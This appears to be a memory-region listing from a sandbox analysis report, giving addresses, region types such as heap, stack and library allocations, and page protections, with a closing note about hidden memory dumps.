|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
29FF9E55000
|
heap
|
page read and write
|
||
|
1C01F3E5000
|
heap
|
page read and write
|
||
|
29FFBBE5000
|
heap
|
page read and write
|
||
|
2DC70EC0000
|
remote allocation
|
page read and write
|
||
|
396E000
|
stack
|
page read and write
|
||
|
1E7AFCC0000
|
trusted library allocation
|
page read and write
|
||
|
29FF9E51000
|
heap
|
page read and write
|
||
|
2DC70B21000
|
trusted library allocation
|
page read and write
|
||
|
F0D04F9000
|
stack
|
page read and write
|
||
|
1C01F501000
|
heap
|
page read and write
|
||
|
1E7B446D000
|
trusted library allocation
|
page read and write
|
||
|
1C01F505000
|
heap
|
page read and write
|
||
|
1C01D440000
|
heap
|
page read and write
|
||
|
1E7AFC80000
|
heap
|
page read and write
|
||
|
F0CFA7B000
|
stack
|
page read and write
|
||
|
1300000
|
heap
|
page read and write
|
||
|
1E7B1851000
|
trusted library allocation
|
page read and write
|
||
|
F0D0FFE000
|
unkown
|
page readonly
|
||
|
29FFBBF1000
|
heap
|
page read and write
|
||
|
1C01D459000
|
heap
|
page read and write
|
||
|
1C01F428000
|
heap
|
page read and write
|
||
|
50D22B8000
|
stack
|
page read and write
|
||
|
29FF9D50000
|
heap
|
page read and write
|
||
|
50D2F8E000
|
stack
|
page read and write
|
||
|
1E7AFCF0000
|
heap
|
page readonly
|
||
|
2DC6C560000
|
trusted library section
|
page readonly
|
||
|
29FF9DE2000
|
heap
|
page read and write
|
||
|
2DC6B600000
|
heap
|
page read and write
|
||
|
1C01D464000
|
heap
|
page read and write
|
||
|
2DC70B00000
|
trusted library allocation
|
page read and write
|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
1E7B16D0000
|
heap
|
page read and write
|
||
|
29FFBC06000
|
heap
|
page read and write
|
||
|
1E7AFB84000
|
heap
|
page read and write
|
||
|
29FF9E53000
|
heap
|
page read and write
|
||
|
1C01D695000
|
heap
|
page read and write
|
||
|
1E7B806D000
|
trusted library allocation
|
page read and write
|
||
|
29FFA008000
|
heap
|
page read and write
|
||
|
2DC6B540000
|
heap
|
page read and write
|
||
|
1E7AFD70000
|
heap
|
page read and write
|
||
|
F0D0EFE000
|
unkown
|
page readonly
|
||
|
F0D07FE000
|
unkown
|
page readonly
|
||
|
1E7AFBF8000
|
heap
|
page read and write
|
||
|
2DC6B5B0000
|
trusted library section
|
page read and write
|
||
|
29FFBBE0000
|
heap
|
page read and write
|
||
|
640BFE000
|
stack
|
page read and write
|
||
|
1E7B946D000
|
trusted library allocation
|
page read and write
|
||
|
50D213E000
|
stack
|
page read and write
|
||
|
11E0000
|
heap
|
page read and write
|
||
|
1C01D670000
|
heap
|
page read and write
|
||
|
1E7B1730000
|
heap
|
page execute and read and write
|
||
|
2DC70C44000
|
heap
|
page read and write
|
||
|
29FFBC0D000
|
heap
|
page read and write
|
||
|
2DC70D04000
|
heap
|
page read and write
|
||
|
1E7B1680000
|
heap
|
page read and write
|
||
|
1C01F42B000
|
heap
|
page read and write
|
||
|
50D233E000
|
stack
|
page read and write
|
||
|
29FF9D89000
|
heap
|
page read and write
|
||
|
2DC6B62B000
|
heap
|
page read and write
|
||
|
29FF9DA8000
|
heap
|
page read and write
|
||
|
29FFA008000
|
heap
|
page read and write
|
||
|
1E7AFBFD000
|
heap
|
page read and write
|
||
|
2DC6B613000
|
heap
|
page read and write
|
||
|
2DC6B6A6000
|
heap
|
page read and write
|
||
|
1E7AFB97000
|
heap
|
page read and write
|
||
|
E9726FE000
|
stack
|
page read and write
|
||
|
1472EF60000
|
direct allocation
|
page read and write
|
||
|
29FFBBF0000
|
heap
|
page read and write
|
||
|
1C01F404000
|
heap
|
page read and write
|
||
|
1E7B766D000
|
trusted library allocation
|
page read and write
|
||
|
29FFBD4A000
|
heap
|
page read and write
|
||
|
F0D12FE000
|
unkown
|
page readonly
|
||
|
E9724FA000
|
stack
|
page read and write
|
||
|
29FFBC52000
|
heap
|
page read and write
|
||
|
29FFBC51000
|
heap
|
page read and write
|
||
|
2DC6B6A0000
|
heap
|
page read and write
|
||
|
E972DFE000
|
stack
|
page read and write
|
||
|
1E7AFBBA000
|
heap
|
page read and write
|
||
|
30DF000
|
stack
|
page read and write
|
There are 427 hidden memdumps, click here to show them.